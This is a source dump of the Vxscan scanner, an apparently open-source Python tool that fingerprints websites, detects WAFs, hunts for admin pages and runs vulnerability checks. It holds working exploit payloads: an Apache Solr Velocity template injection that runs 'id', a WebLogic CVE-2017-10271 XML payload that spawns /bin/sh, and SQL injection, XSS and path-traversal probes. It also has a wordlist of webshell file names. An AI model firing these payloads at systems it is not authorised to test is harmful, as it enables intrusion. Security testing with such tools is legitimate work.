else: 40 | open_port = ['CDN:0'] 41 | 42 | # 调用POC 43 | Vuln(url, host, open_port, apps, dbname).run() 44 | 45 | if isopen: 46 | if CRAWL: 47 | Crawl(url, dbname).pool() 48 | if SCANDIR: 49 | dirscan = DirScan(dbname, apps, url, title) 50 | dirscan.pool() 51 | if data: 52 | web_save(data, dbname) 53 | 54 | 55 | if __name__ == "__main__": 56 | start('http://127.0.0.1') 57 | -------------------------------------------------------------------------------- /script/find_admin.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | # author: al0ne 3 | # https://github.com/al0ne 4 | 5 | import re 6 | 7 | from lib.Requests import Requests 8 | from lib.settings import PAGE_404 9 | from lib.verify import get_list 10 | 11 | path = [ 12 | '/admin', '/login', '/manage', '/manager', '/System', '/User', '/adminlogin', '/Admin_login', '/backage', 13 | '/login.php', '/admin.php', '/admin_login.php', '/main/login' 14 | ] 15 | 16 | 17 | def verify(text): 18 | result = True 19 | for i in PAGE_404: 20 | if i in text: 21 | result = False 22 | break 23 | if re.search('^false$|^post2$|宝塔Linux面板', text): 24 | result = False 25 | return result 26 | 27 | 28 | def get_info(url): 29 | try: 30 | req = Requests() 31 | for i in path: 32 | r = req.get(url + i) 33 | if r.status_code == 200: 34 | if re.search(r'admin|login|manager|登陆|管理|后台|type="password"|入口|admin_passwd', r.text, re.S): 35 | if verify(r.text): 36 | return 'Admin_Page : ' + url + i 37 | elif r.status_code == 403: 38 | return 'May be the login page : ' + url + i 39 | 40 | except: 41 | pass 42 | 43 | 44 | def check(url, ip, ports, apps): 45 | result = [] 46 | probe = get_list(url, ports) 47 | for i in probe: 48 | if re.search(r':\d+', i): 49 | out = get_info(i) 50 | if out: 51 | result.append(out) 52 | if result: 53 | return result 54 | -------------------------------------------------------------------------------- /plugins/ActiveReconnaissance/check_waf.py: -------------------------------------------------------------------------------- 1 | import logging 2 | import re 3 | 4 | from lib.Requests import Requests 5 | from lib.iscdn import iscdn 6 | from lib.url import parse_host 7 | from lib.waf import WAF_RULE 8 | 9 | ''' 10 | WAF 检测思路 11 | 发送Payload触发WAF拦截机制,根据响应头字段或者响应体拦截内容判断WAF 12 | ''' 13 | 14 | payload = ( 15 | "/index.php?id=1 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert(XSS)</script>',table_name FROM information_schema.tables WHERE 2>1--/**/", 16 | "/../../../etc/passwd", "/.git/", "/phpinfo.php") 17 | 18 | 19 | def verify(headers, content): 20 | for i in WAF_RULE: 21 | name, method, position, regex = i.split('|') 22 | if method == 'headers': 23 | if headers.get(position) is not None: 24 | if re.search(regex, str(headers.get(position))) is not None: 25 | return name 26 | else: 27 | if re.search(regex, str(content)): 28 | return name 29 | 30 | return 'NoWAF' 31 | 32 | 33 | def checkwaf(url): 34 | result = 'NoWAF' 35 | host = parse_host(url) 36 | 37 | if not iscdn(host): 38 | return 'CDN IP' 39 | 40 | try: 41 | req = Requests() 42 | r = req.get(url) 43 | result = verify(r.headers, r.text) 44 | if result == 'NoWAF': 45 | for i in payload: 46 | r = req.get(url + i) 47 | result = verify(r.headers, r.text) 48 | if result != 'NoWAF': 49 | return result 50 | else: 51 | return result 52 | except (UnboundLocalError, AttributeError): 53 | pass 54 | except Exception as e: 55 | logging.exception(e) 56 | 57 | 58 | if __name__ == "__main__": 59 | out = checkwaf('http://127.0.0.1') 60 | print(out) 61 | -------------------------------------------------------------------------------- /script/solr_rce_via_velocity.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | from lib.Requests import Requests 3 | from lib.verify import verify 4 | 5 | # >5? (not sure when config API is introduced) - latest (tested on 8.2.0) 6 | 7 | vuln = ['Solr', '8983'] 8 | req = Requests() 9 | 10 | 11 | def send_exp(url): 12 | payload = r"/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end" 13 | try: 14 | r = req.get(url + payload) 15 | if 'uid=' in r.text: 16 | return 'Apache Solr RCE via Velocity' 17 | except Exception: 18 | pass 19 | 20 | 21 | def query_config(url): 22 | payload = ''' 23 | { 24 | "update-queryresponsewriter": { 25 | "startup": "lazy", 26 | "name": "velocity", 27 | "class": "solr.VelocityResponseWriter", 28 | "template.base.dir": "", 29 | "solr.resource.loader.enabled": "true", 30 | "params.resource.loader.enabled": "true" 31 | } 32 | }''' 33 | try: 34 | r = req.post(url + '/solr/test/config', payload) 35 | if r.status_code == 200 and 'responseHeader' in r.text: 36 | result = send_exp(url) 37 | return result 38 | except Exception: 39 | pass 40 | 41 | 42 | def check(url, ip, ports, apps): 43 | if verify(vuln, ports, apps): 44 | url = 'http://' + ip + ':8983' 45 | result = query_config(url) 46 | if result: 47 | return result 48 | -------------------------------------------------------------------------------- /script/Weblogic_CVE_2017_10271_RCE.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | from lib.random_header import get_ua 4 | from lib.verify import verify 5 | 6 | vuln = ['http', 'weblogic', '7001'] 7 | 8 | 9 | def check(url, ip, ports, apps): 10 | if verify(vuln, ports, apps): 11 | HEADERS = get_ua() 12 | HEADERS.update({'Content-Type': 'text/xml'}) 13 | url = 'http://{}:7001/wls-wsat/CoordinatorPortType'.format(ip) 14 | data = ''' 15 | <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 16 | <soapenv:Header> 17 | <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 18 | <java> 19 | <object class="java.lang.ProcessBuilder"> 20 | <array class="java.lang.String" length="3"> 21 | <void index="0"> 22 | <string>/bin/sh</string> 23 | </void> 24 | <void index="1"> 25 | <string>-c</string> 26 | </void> 27 | <void index="2"> 28 | <string>echo xss</string> 29 | </void> 30 | </array> 31 | <void method="start"/> 32 | </object> 33 | </java> 34 | </work:WorkContext> 35 | </soapenv:Header> 36 | <soapenv:Body/> 37 | </soapenv:Envelope> 38 | ''' 39 | 40 | try: 41 | r = requests.post(url, data=data, verify=False, timeout=5, headers=HEADERS) 42 | text = r.text 43 | except Exception: 44 | text = "" 45 | 46 | if '<faultstring>java.lang.ProcessBuilder' in text or "<faultstring>0" in text: 47 | return ('CVE-2017-10271 Weglogic RCE {}'.format(url)) 48 | -------------------------------------------------------------------------------- /lib/web_info.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import logging 3 | 4 | import chardet 5 | 6 | from lib.Requests import Requests 7 | from lib.cli_output import console 8 | from lib.iscdn import iscdn 9 | from lib.url import parse_host, parse_ip 10 | from plugins.ActiveReconnaissance.check_waf import checkwaf 11 | from plugins.ActiveReconnaissance.osdetect import osdetect 12 | from plugins.InformationGathering.geoip import geoip 13 | from plugins.PassiveReconnaissance.wappalyzer import WebPage 14 | 15 | 16 | def web_info(url): 17 | host = parse_host(url) 18 | ipaddr = parse_ip(host) 19 | url = url.strip('/') 20 | address = geoip(ipaddr) 21 | wafresult = checkwaf(url) 22 | req = Requests() 23 | # noinspection PyBroadException 24 | try: 25 | r = req.get(url) 26 | coding = chardet.detect(r.content).get('encoding') 27 | r.encoding = coding 28 | webinfo = WebPage(r.url, r.text, r.headers).info() 29 | except Exception as e: 30 | logging.exception(e) 31 | webinfo = {} 32 | if webinfo: 33 | console('Webinfo', host, 'title: {}\n'.format(webinfo.get('title'))) 34 | console('Webinfo', host, 'Fingerprint: {}\n'.format(webinfo.get('apps'))) 35 | console('Webinfo', host, 'Server: {}\n'.format(webinfo.get('server'))) 36 | console('Webinfo', host, 'WAF: {}\n'.format(wafresult)) 37 | else: 38 | webinfo = {} 39 | wafresult = 'None' 40 | if iscdn(host): 41 | osname = osdetect(host) 42 | else: 43 | osname = None 44 | 45 | data = { 46 | host: { 47 | 'WAF': wafresult, 48 | 'Ipaddr': ipaddr, 49 | 'Address': address, 50 | 'Webinfo': webinfo, 51 | 'OS': osname, 52 | } 53 | } 54 | 55 | return data, webinfo.get('apps'), webinfo.get('title') 56 | 57 | 58 | if __name__ == "__main__": 59 | web_info('http://127.0.0.1') 60 | -------------------------------------------------------------------------------- /lib/settings.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | 3 | # True 调用asyncio+aiohttp+uvloop 异步扫描 4 | # False 调用传统多线程扫描 5 | METHOD = True 6 | 7 | # 全局超时时间 8 | TIMEOUT = 5 9 | 10 | # 国家验证 11 | VERIFY_COUNTRY = False 12 | 13 | # 要排除的状态吗 14 | BLOCK_CODE = [ 15 | 0, 308, 400, 401, 403, 404, 405, 406, 408, 410, 411, 414, 417, 418, 419, 429, 461, 493, 500, 502, 503, 504, 999 16 | ] 17 | # 设置扫描线程 18 | THREADS = 100 19 | # 要排除的 内容类型 20 | BLOCK_CONTYPE = [ 21 | 'image/jpeg', 'image/gif', 'image/png', 'text/css', 'application/x-shockwave-flash', 'image/x-icon', 'x-icon' 22 | ] 23 | 24 | # 是否启动目录扫描 25 | SCANDIR = True 26 | 27 | # 是否启动POC插件 28 | POC = True 29 | 30 | # 是否开启抓取插件 31 | CRAWL = False 32 | 33 | # 如果存在于结果db中就跳过 34 | CHECK_DB = False 35 | 36 | # 无效的404页面 37 | PAGE_404 = [ 38 | 'page_404"', "404.png", '找不到页面', '页面找不到', "访问的页面不存在", "page does't exist", 'notice_404', '404 not found', 39 | '<title>错误', '内容正在加载', '提示:发生错误', '无法加载控制器', '无法加载模块:', '当前页面不存在或已删除', '>错误:操作无法执行', '您访问的网站出错了', 40 | 'URL不符合规定', '没有找到站点', '您所访问的页面不存在', 'File not found', 'Page not found', 'Error code: 404', '>您所提交的请求含有不合法的参数', 41 | '>404 Error', 'Web server is returning an unknown error', 'website not found', '"page404"', '

页面找不到了', 42 | '抱歉,找不到此页面', 'page now can not be found', '您访问的资源不存在', 'error404 ', '/404.jpg', '您打开的页面未能找到', '"statusCode":404', 43 | '你访问的页面不存在', '您访问的页面不存在或者已经删除', '你想查看的页面已被转移或删除了', '404 - 页面没找到', '404', '指定的主题不存在或已被删除或正在被审核', 44 | '404 Not Found', '抱歉,此页面不存在', '抱歉,此頁面不存在', '"404page"', '>404 PAGE', '"search-404"', 'that page doesn’t exist!', 45 | '"error.404.header"', '"error.404.link"', 'error_pages', '?ref=404"', '>未找到页面<', '您的请求在Web服务器中没有找到对应的站点', 46 | 'You need to enable JavaScript to run this app', '404 - 页面不存在' 47 | ] 48 | 49 | # ping探测 50 | PING = True 51 | 52 | # 设置代理 53 | # SOCKS5 = ('127.0.0.1', 1080) 54 | SOCKS5 = () 55 | 56 | # shodan 57 | SHODAN_API = '' 58 | 59 | # VT接口 60 | VIRUSTOTAL_API = '' 61 | 62 | # 设置cookie 63 | COOKIE = 'random' 64 | # COOKIE = {'Cookie': 'SRCtest'} 65 | -------------------------------------------------------------------------------- /lib/cli_output.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import time 3 | 4 | import pyfiglet 5 | 6 | from lib.bcolors import Bcolors 7 | from lib.settings import POC, THREADS, SCANDIR, PING, SOCKS5, CHECK_DB 8 | 9 | 10 | def banner(): 11 | ascii_banner = pyfiglet.figlet_format("Vxscan") 12 | print(Bcolors.RED + ascii_banner + Bcolors.ENDC) 13 | 14 | 15 | def start_out(hosts): 16 | sys.stdout.write(Bcolors.OKBLUE + "[*] https://github.com/al0ne/Vxscan\n" + Bcolors.ENDC) 17 | sys.stdout.write(Bcolors.OKBLUE + "[*] Scanning POC: " + Bcolors.ENDC) 18 | sys.stdout.write(Bcolors.OKBLUE + str(POC) + "\n" + Bcolors.ENDC) 19 | sys.stdout.write(Bcolors.OKBLUE + "[*] Threads: " + Bcolors.ENDC) 20 | sys.stdout.write(Bcolors.OKBLUE + str(THREADS) + "\n" + Bcolors.ENDC) 21 | sys.stdout.write(Bcolors.OKBLUE + "[*] Target quantity: " + Bcolors.ENDC) 22 | if type(hosts) == list: 23 | sys.stdout.write(Bcolors.OKBLUE + str(len(hosts)) + "\n" + Bcolors.ENDC) 24 | else: 25 | sys.stdout.write(Bcolors.OKBLUE + '1' + "\n" + Bcolors.ENDC) 26 | sys.stdout.write(Bcolors.OKBLUE + "[*] Scanning Dir: " + Bcolors.ENDC) 27 | sys.stdout.write(Bcolors.OKBLUE + str(SCANDIR) + "\n" + Bcolors.ENDC) 28 | sys.stdout.write(Bcolors.OKBLUE + "[*] Ping: " + Bcolors.ENDC) 29 | sys.stdout.write(Bcolors.OKBLUE + str(PING) + "\n" + Bcolors.ENDC) 30 | sys.stdout.write(Bcolors.OKBLUE + "[*] CHECK_DB: " + Bcolors.ENDC) 31 | sys.stdout.write(Bcolors.OKBLUE + str(CHECK_DB) + "\n" + Bcolors.ENDC) 32 | sys.stdout.write(Bcolors.OKBLUE + "[*] Socks5 Proxy: " + Bcolors.ENDC) 33 | sys.stdout.write(Bcolors.OKBLUE + str(SOCKS5) + "\n\n" + Bcolors.ENDC) 34 | 35 | 36 | def console(plugins, domain, text): 37 | timestamp = time.strftime("%H:%M:%S", time.localtime()) 38 | timestamp = Bcolors.OKBLUE + '[' + timestamp + ']' + Bcolors.ENDC 39 | plugins = Bcolors.RED + plugins + Bcolors.ENDC 40 | text = Bcolors.OKGREEN + text + Bcolors.ENDC 41 | sys.stdout.write(timestamp + ' - ' + plugins + ' - ' + domain + ' ' + text) 42 | -------------------------------------------------------------------------------- /lib/vuln.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | # author: al0ne 3 | # https://github.com/al0ne 4 | 5 | import concurrent.futures 6 | import glob 7 | import importlib 8 | import logging 9 | import os 10 | import random 11 | import time 12 | 13 | from lib.cli_output import console 14 | from lib.sqldb import Sqldb 15 | from lib.url import parse_host 16 | 17 | 18 | class Vuln: 19 | def __init__(self, url, host, ports, apps, dbname): 20 | host = parse_host(host) 21 | self.url = url 22 | self.ip = host 23 | self.apps = apps 24 | self.dbname = dbname 25 | self.ports = ports 26 | self.out = [] 27 | 28 | def vuln(self, script): 29 | check_func = getattr(script, 'check') 30 | result = check_func(self.url, self.ip, self.ports, self.apps) 31 | if result: 32 | if type(result) == str: 33 | self.out.append(result) 34 | else: 35 | self.out.extend(result) 36 | 37 | def run(self): 38 | scripts = [] 39 | try: 40 | for _ in glob.glob('script/*.py'): 41 | script_name = os.path.basename(_).replace('.py', '') 42 | vuln = importlib.import_module('script.%s' % script_name) 43 | scripts.append(vuln) 44 | # 随机打乱脚本加载顺序 45 | random.shuffle(scripts) 46 | with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor: 47 | vulns = {executor.submit(self.vuln, script): script for script in scripts} 48 | for future in concurrent.futures.as_completed(vulns, timeout=3): 49 | future.result() 50 | self.out = list(filter(None, self.out)) 51 | for i in self.out: 52 | console('Vuln', self.ip, i + '\n') 53 | 54 | Sqldb(self.dbname).get_vuln(self.ip, self.out) 55 | except (EOFError, concurrent.futures._base.TimeoutError): 56 | pass 57 | except Exception as e: 58 | logging.exception(e) 59 | 60 | 61 | if __name__ == "__main__": 62 | start_time = time.time() 63 | Vuln('', [''], [''], ['']).run() 64 | end_time = time.time() 65 | print('\nrunning {0:.3f} seconds...'.format(end_time - start_time)) 66 | -------------------------------------------------------------------------------- /lib/options.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import argparse 3 | import ipaddress 4 | import logging 5 | import time 6 | 7 | from lib.cli_output import start_out 8 | from lib.common import start 9 | from plugins.ActiveReconnaissance.active import ActiveCheck 10 | from report import gener 11 | 12 | 13 | def read_file(file, dbname): 14 | hosts = [] 15 | try: 16 | with open(file, 'rt') as f: 17 | for ip in f.readlines(): 18 | hosts.append(ip.strip()) 19 | start_out(hosts) 20 | hosts2 = ActiveCheck(hosts).pool() 21 | for i in hosts2: 22 | start(i, dbname) 23 | except FileNotFoundError: 24 | print('input file') 25 | except Exception as e: 26 | logging.exception(e) 27 | 28 | 29 | def inet(net, dbname): 30 | hosts = [] 31 | try: 32 | result = list(ipaddress.ip_network(net).hosts()) 33 | for ip in result: 34 | hosts.append(str(ip)) 35 | start_out(hosts) 36 | except Exception as e: 37 | print("The task could not be carried out. {}".format(str(e))) 38 | hosts2 = ActiveCheck(hosts).pool() 39 | for i in hosts2: 40 | start(i, dbname) 41 | 42 | 43 | def options(): 44 | start_time = time.time() 45 | parser = argparse.ArgumentParser(description='Vxscan V2.0') 46 | parser.add_argument("-u", "--url", help='Start scanning url -u xxx.com or -u url1,url2') 47 | parser.add_argument("-f", "--file", help='read the url from the file') 48 | parser.add_argument("-s", "--save", help='save in dbfile') 49 | parser.add_argument("-i", "--inet", help='cidr eg. 1.1.1.1 or 1.1.1.0/24') 50 | args = parser.parse_args() 51 | if args.save: 52 | dbname = args.save 53 | else: 54 | dbname = 'result' 55 | if args.inet: 56 | inet(args.inet, dbname) 57 | if args.url: 58 | start_out(args.url) 59 | if ActiveCheck([args.url]).pool(): 60 | start(args.url, dbname) 61 | if args.file: 62 | read_file(args.file, dbname) 63 | end_time = time.time() 64 | if args.file or args.url or args.inet: 65 | gener() 66 | print('\nrunning {0:.3f} seconds...'.format(end_time - start_time)) 67 | else: 68 | print('No scan url, Please start scanning with -u or -f') 69 | -------------------------------------------------------------------------------- /data/path/asp.txt: -------------------------------------------------------------------------------- 1 | /cache.asp 2 | /Sql.asp 3 | /md5.asp 4 | /index.asp 5 | /config.asp 6 | /red.asp 7 | /md5.aspx 8 | /test.asp 9 | /Somnus.asp 10 | /Admin_Ta.asp 11 | /error.asp 12 | /index_.asp 13 | /Thumb.asp 14 | /SqlIn.asp 15 | /s.asp 16 | /sdfg.asp 17 | /uploadfile.asp 18 | /a.asp 19 | /weki.asp 20 | /css.asp 21 | /1.asp 22 | /mumaasp.asp 23 | /logo_bg.asp 24 | /mcds.asp 25 | /data.asp 26 | /api.asp 27 | /DA.asp 28 | /concon.asp 29 | /check.asp 30 | /SqlOut.asp 31 | /x.asp;.jpg 32 | /links.asp 33 | /Pruest.asp 34 | /banner_2.jpg.asp 35 | /AspCms_CollectFun.asp 36 | /niucai.asp 37 | /90.asp 38 | /company.asp 39 | /templata.asp 40 | /as.asp 41 | /11m.asp 42 | /ver.asp 43 | /x.asp 44 | /jianzi.asp 45 | /seo.asp 46 | /sqzr.asp 47 | /zhanpushi.asp 48 | /aa.asp 49 | /aspcms_config.asp 50 | /conn.asp 51 | /contes.asp 52 | /marquee.asp 53 | /version.asp 54 | /siteweb.asp 55 | /1.aspx 56 | /DASA.asp 57 | /tunnel.aspx 58 | /login.aspx 59 | /output.aspx 60 | /xycx.aspx 61 | /messageboard.aspx 62 | /old_certificate.aspx 63 | /checksporterregister.aspx 64 | /sportunit.aspx 65 | /localworkerlist.aspx 66 | /senderlist.aspx 67 | /Login.aspx 68 | /addtargettest.aspx 69 | /approve.aspx 70 | /setregyear.aspx 71 | /userpass.aspx 72 | /addmostlymsn.aspx 73 | /index.aspx 74 | /indexbak.aspx 75 | /workerregister.aspx 76 | /xycx2.aspx 77 | /11.asp 78 | /m_successmodify.aspx 79 | /80sec.asp 80 | /coachnotsubmitlist.aspx 81 | /list.aspx 82 | /schooldetail.aspx 83 | /sportertargettest.aspx 84 | /360.aspx 85 | /Search.aspx 86 | /default.aspx 87 | /localretiresporterlist.aspx 88 | /del.aspx 89 | /pageload.aspx 90 | /questionlist.aspx 91 | /rycx_new.aspx 92 | /umpireregister.aspx 93 | /111.aspx 94 | /barcode.aspx 95 | /content_index.aspx 96 | /usermodify.aspx 97 | /MessageBoardList.aspx 98 | /about.asp 99 | /default_en.asp 100 | /helloworld.aspx 101 | /messageboarddetail.aspx 102 | /phonebarcode.aspx 103 | /search.asp 104 | /123.aspx 105 | /ProductDisplay.aspx 106 | /guiyang.aspx 107 | /help3.asp 108 | /ic02.asp 109 | /jj.aspx 110 | /l.asp 111 | /newview.asp 112 | /opinionmore.aspx 113 | /per_dataResult.aspx 114 | /reDuh.aspx 115 | /report_rekapitulasi.aspx 116 | /search.aspx 117 | /test.aspx 118 | /testtestfuck.aspx 119 | /themedetails.aspx 120 | /wan.aspx 121 | /yijuhua.aspx -------------------------------------------------------------------------------- /plugins/PassiveReconnaissance/reverse_domain.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | # author: al0ne 3 | # https://github.com/al0ne 4 | 5 | import json 6 | import re 7 | import sys 8 | 9 | import requests 10 | import tldextract 11 | 12 | from lib.bcolors import Bcolors 13 | from lib.cli_output import console 14 | from lib.iscdn import iscdn 15 | from lib.random_header import get_ua 16 | 17 | 18 | def reverse_domain(host): 19 | # 查询旁站 20 | sys.stdout.write(Bcolors.RED + "\nReverse IP Domain Check:\n" + Bcolors.ENDC) 21 | if iscdn(host): 22 | result = [] 23 | data = {"remoteAddress": "{0}".format(host), "key": ""} 24 | header = get_ua() 25 | try: 26 | r = requests.post('https://domains.yougetsignal.com/domains.php', 27 | headers=header, 28 | data=data, 29 | timeout=5, 30 | verify=False) 31 | text = json.loads(r.text) 32 | domain = tldextract.extract(host) 33 | for i in text.get('domainArray'): 34 | url = i[0] 35 | if url != host: 36 | if tldextract.extract(url).domain == domain.domain: 37 | result.append(url) 38 | elif re.search(r'\d+\.\d+\.\d+\.\d+', url): 39 | result.append(url) 40 | except: 41 | try: 42 | r = requests.get('http://api.hackertarget.com/reverseiplookup/?q={}'.format(host), 43 | headers=get_ua(), 44 | timeout=4, 45 | verify=False) 46 | if '<html>' not in r.text and 'No DNS A records found for' not in r.text: 47 | text = r.text 48 | for _ in text.split('\n'): 49 | if _: 50 | result.append(_) 51 | else: 52 | result = [] 53 | except: 54 | pass 55 | if len(result) < 20: 56 | if result: 57 | for i in result: 58 | console('reverse_domain', host, i + '\n') 59 | else: 60 | console('reverse_domain', host, 'None\n') 61 | return result 62 | else: 63 | console('reverse_domain', host, 'The maximum number of domain names exceeded (20)\n') 64 | # sys.stdout.write(Bcolors.OKGREEN + 'The maximum number of domain names exceeded (20)\n' + Bcolors.ENDC) 65 | return ['The maximum number of domain names exceeded (20)'] 66 | 67 | 68 | if __name__ == "__main__": 69 | print(reverse_domain('testphp.vulnweb.com')) 70 | -------------------------------------------------------------------------------- /lib/url.py: -------------------------------------------------------------------------------- 1 | import logging 2 | import re 3 | from urllib import parse 4 | 5 | import dns.resolver 6 | 7 | 8 | def parse_host(url): 9 | # 根据url得到主机host 例如 http://1.1.1.1:80 返回 1.1.1.1 10 | if (not parse.urlparse(url).path) and (parse.urlparse(url).path != '/'): 11 | host = url.replace('http://', '').replace('https://', '').rstrip('/') 12 | else: 13 | host = url.replace('http://', '').replace('https://', '').rstrip('/') 14 | host = re.sub(r'/\w+', '', host) 15 | if ':' in host: 16 | host = re.sub(r':\d+', '', host) 17 | return host 18 | 19 | 20 | def parse_ip(host): 21 | host = parse_host(host) 22 | # 根据domain得到ip 例如www.xxx.com 得到 x.x.x.x 23 | try: 24 | resolver = dns.resolver.Resolver() 25 | resolver.nameservers = ['1.1.1.1', '8.8.8.8'] 26 | a = resolver.query(host, 'A') 27 | for i in a.response.answer: 28 | for j in i.items: 29 | if hasattr(j, 'address'): 30 | if not re.search(r'1\.1\.1\.1|8\.8\.8\.8|127\.0\.0\.1|114\.114\.114\.114|0\.0\.0\.0', j.address): 31 | return j.address 32 | except dns.resolver.NoAnswer: 33 | pass 34 | except Exception as e: 35 | logging.exception(e) 36 | return host 37 | 38 | 39 | def diff(urls): 40 | parms = [] 41 | host = [] 42 | result = [] 43 | path = [] 44 | # url = 'https://www.xxx.com/?page=1 45 | # 伪静态去重 通过urlparse取出来page=1,根据逗号拆分取出来k=page,然后保存不重复的k 46 | for i in urls: 47 | url = parse.urlparse(i) 48 | print(url) 49 | k, v, *_ = url.query.split('=') 50 | if url.netloc in host: 51 | if url.path in path: 52 | if k not in parms: 53 | parms.append(k) 54 | result.append(i) 55 | else: 56 | result.append(i) 57 | path.append(url.path) 58 | else: 59 | host.append(url.netloc) 60 | result.append(i) 61 | path.append(url.path) 62 | parms.append(k) 63 | 64 | return result 65 | 66 | 67 | def dedup_link(urls): 68 | host = [] 69 | _ = [] 70 | furls = [] 71 | for i in set(urls): 72 | # 只保留有参数的url其余的略过 73 | if '=' in i and not re.search(r"'|@|\+", i): 74 | #  判断url是不是伪静态,伪静态与普通的去重方法不一样 75 | if re.search(r'/\?\d+=', i): 76 | furls.append(i) 77 | else: 78 | # 通过urlparse 对url进行去参去重,相同的丢弃 79 | url = parse.urlparse(i) 80 | if url.netloc + url.path not in host: 81 | host.append(url.netloc + url.path) 82 | _.append(i) 83 | _.extend(diff(furls)) 84 | return _ -------------------------------------------------------------------------------- /report/en.js: -------------------------------------------------------------------------------- 1 | (function (global, factory) { 2 | if (typeof define === "function" && define.amd) { 3 | define('element/locale/en', ['module', 'exports'], factory); 4 | } else if (typeof exports !== "undefined") { 5 | factory(module, exports); 6 | } else { 7 | var mod = { 8 | exports: {} 9 | }; 10 | factory(mod, mod.exports); 11 | global.ELEMENT.lang = global.ELEMENT.lang || {}; 12 | global.ELEMENT.lang.en = mod.exports; 13 | } 14 | })(this, function (module, exports) { 15 | 'use strict'; 16 | 17 | exports.__esModule = true; 18 | exports.default = { 19 | el: { 20 | colorpicker: { 21 | confirm: 'OK', 22 | clear: 'Clear' 23 | }, 24 | datepicker: { 25 | now: 'Now', 26 | today: 'Today', 27 | cancel: 'Cancel', 28 | clear: 'Clear', 29 | confirm: 'OK', 30 | selectDate: 'Select date', 31 | selectTime: 'Select time', 32 | startDate: 'Start Date', 33 | startTime: 'Start Time', 34 | endDate: 'End Date', 35 | endTime: 'End Time', 36 | prevYear: 'Previous Year', 37 | nextYear: 'Next Year', 38 | prevMonth: 'Previous Month', 39 | nextMonth: 'Next Month', 40 | year: '', 41 | month1: 'January', 42 | month2: 'February', 43 | month3: 'March', 44 | month4: 'April', 45 | month5: 'May', 46 | month6: 'June', 47 | month7: 'July', 48 | month8: 'August', 49 | month9: 'September', 50 | month10: 'October', 51 | month11: 'November', 52 | month12: 'December', 53 | // week: 'week', 54 | weeks: { 55 | sun: 'Sun', 56 | mon: 'Mon', 57 | tue: 'Tue', 58 | wed: 'Wed', 59 | thu: 'Thu', 60 | fri: 'Fri', 61 | sat: 'Sat' 62 | }, 63 | months: { 64 | jan: 'Jan', 65 | feb: 'Feb', 66 | mar: 'Mar', 67 | apr: 'Apr', 68 | may: 'May', 69 | jun: 'Jun', 70 | jul: 'Jul', 71 | aug: 'Aug', 72 | sep: 'Sep', 73 | oct: 'Oct', 74 | nov: 'Nov', 75 | dec: 'Dec' 76 | } 77 | }, 78 | select: { 79 | loading: 'Loading', 80 | noMatch: 'No matching data', 81 | noData: 'No data', 82 | placeholder: 'Select' 83 | }, 84 | cascader: { 85 | noMatch: 'No matching data', 86 | loading: 'Loading', 87 | placeholder: 'Select' 88 | }, 89 | pagination: { 90 | goto: 'Go to', 91 | pagesize: '/page', 92 | total: 'Total {total}', 93 | pageClassifier: '' 94 | }, 95 | messagebox: { 96 | title: 'Message', 97 | confirm: 'OK', 98 | cancel: 'Cancel', 99 | error: 'Illegal input' 100 | }, 101 | upload: { 102 | deleteTip: 'press delete to remove', 103 | delete: 'Delete', 104 | preview: 'Preview', 105 | continue: 'Continue' 106 | }, 107 | table: { 108 | emptyText: 'No Data', 109 | confirmFilter: 'Confirm', 110 | resetFilter: 'Reset', 111 | clearFilter: 'All', 112 | sumText: 'Sum' 113 | }, 114 | tree: { 115 | emptyText: 'No Data' 116 | }, 117 | transfer: { 118 | noMatch: 'No matching data', 119 | noData: 'No data', 120 | titles: ['List 1', 'List 2'], // to be translated 121 | filterPlaceholder: 'Enter keyword', // to be translated 122 | noCheckedFormat: '{total} items', // to be translated 123 | hasCheckedFormat: '{checked}/{total} checked' // to be translated 124 | } 125 | } 126 | }; 127 | module.exports = exports['default']; 128 | }); -------------------------------------------------------------------------------- /plugins/InformationGathering/js_leaks.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | # author: al0ne 3 | # https://github.com/al0ne 4 | 5 | import concurrent.futures 6 | import logging 7 | import re 8 | import time 9 | 10 | from lib.Requests import Requests 11 | 12 | 13 | def verify(text): 14 | # 验证匹配结果 15 | result = True 16 | for i in text: 17 | if not re.search(r'^0\d\.\d+\.\d+\.\d+|google|recaptcha|gtm\.js|png$|gif$|jpg$|\b\d+\.\d+\.0\.0', i): 18 | result = False 19 | break 20 | return result 21 | 22 | 23 | class JsLeaks: 24 | def __init__(self): 25 | self.result = [] 26 | self.req = Requests() 27 | 28 | def pool(self, urls): 29 | try: 30 | with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor: 31 | result = {executor.submit(self.get_js, i): i for i in urls} 32 | for future in concurrent.futures.as_completed(result, timeout=3): 33 | future.result() 34 | except (EOFError, concurrent.futures._base.TimeoutError): 35 | pass 36 | except Exception as e: 37 | logging.exception(e) 38 | 39 | return self.result 40 | 41 | def get_js(self, url): 42 | r = self.req.get(url) 43 | regex = ( 44 | # 匹配url 45 | r'\b(?:http:|https:)(?:[\w/\.]+)?(?:[a-zA-Z0-9_\-\.]{1,})\.(?:php|asp|ashx|jspx|aspx|jsp|json|action|html|txt|xml|do|js)\b', 46 | r'([a-zA-Z0-9_\-]{1,}\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\?[^\"|\']{0,}|))', 47 | # 匹配邮箱 48 | 